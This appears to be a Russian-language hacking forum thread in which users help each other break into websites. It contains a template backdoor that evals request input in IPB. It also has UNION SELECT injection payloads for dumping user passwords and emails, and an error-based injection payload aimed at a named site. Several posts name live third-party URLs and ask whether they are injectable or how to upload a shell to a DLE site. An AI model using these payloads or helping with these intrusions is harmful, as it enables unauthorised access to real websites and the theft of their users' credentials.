В какой шаблон ты вписал этот код ? НЕ найду. <if="$this->ipsclass->input['kod'] = 1"> <if="eval($this->ipsclass->input['pzdc'])"></if> </if> Как я понимаю, ты нашел новый способ заливки шеллов в IPB
Привет %Username%, вопрос в следующем нащупал sql иньекцию, и все впринципе нормально, но есть пару но: Вытащить могу данные только одного юзверя, если укажу его айди например: Code: xxxx.php?wid=1&pid=-1+union+select+password+from +users +where uid =506 получаю пароль: %pass% Но когда составляю запрос, что бы получить список всех юзверей, например: Code: .php?wid=2&pid=-1+union+select+email+from +users + group + by + uid+ desc На что мне выдает стринг с текстом : Array Так же проблема выдать комбинированный запрос: Code: .php?wid=2&pid=-1+union+select+email,uid+from +users where uid = 808 В ответ The used SELECT statements have a different number of columns Буду рад просвещению, с иньекциями раньше никогда толком не работал, но вот пришлось.
Задаю не в первый раз. Вопрос насчет каким парсером пользуетесь, товарищи, для sql инъекции?. Актуально PS: sql poizon сломался, в гугл парсерах смысла не вижу, так как банит.
ну а как, пробуй все те же методы что и в админ панель. http://www.forum.antichat.net/showthread.php?p=2935725 Spot, а что мешает через лимит спарсить? или если массово, пробуй GROUP_CONCAT() только тут ограничение на кол-во выводимых данных, по умлочанию — 1024 правильный синтаксис такой — concat_ws(0x3a,email,uid) или concat stan0009, попробуй Яшкалюб, а чекать на скули sqlndm
тут concat_ws() не причем хотя очень полезная функция, тут uid надо задать в хексе или в кавычки если не экранируется, вот пример:
http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87 ребята прошу просто посмотреть есть ли тут инъекцыя??
2pirat0, не думаю. 2Gaben7, если есть LFI, то можно залить шелл. А так, phpinfo(); дает представление, с чем ты имеешь дело. Узнаешь пути, отключенные функции и т.д.
http://s-zon.org/pricelists_good.php?PriceLists&id_pl=29&id_g=170&c1=-1 вроде php-injection? но чет подставляю страницы - не читает, почему так??
http://biclopsgames.com/game.php?id=1+and+1=(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
Нужна ваша помощь, имеется DLE сайт, версия 5.5, опробовал уже много способов заливки шелла, нечего не получилось. Опробовал добавление разрешение пхп, и хтчекс в конфиг, нечего не вышло и еще пару штук. Если кто-то может помочь, буду рад
подскажите в чем пробл. id=-983 GROUP BY 2 -- через group выяснил что 2 поля но когда делаю id=-983 UNION SELECT 1,2 все равно пишет что Query failed: The used SELECT statements have a different number of columns
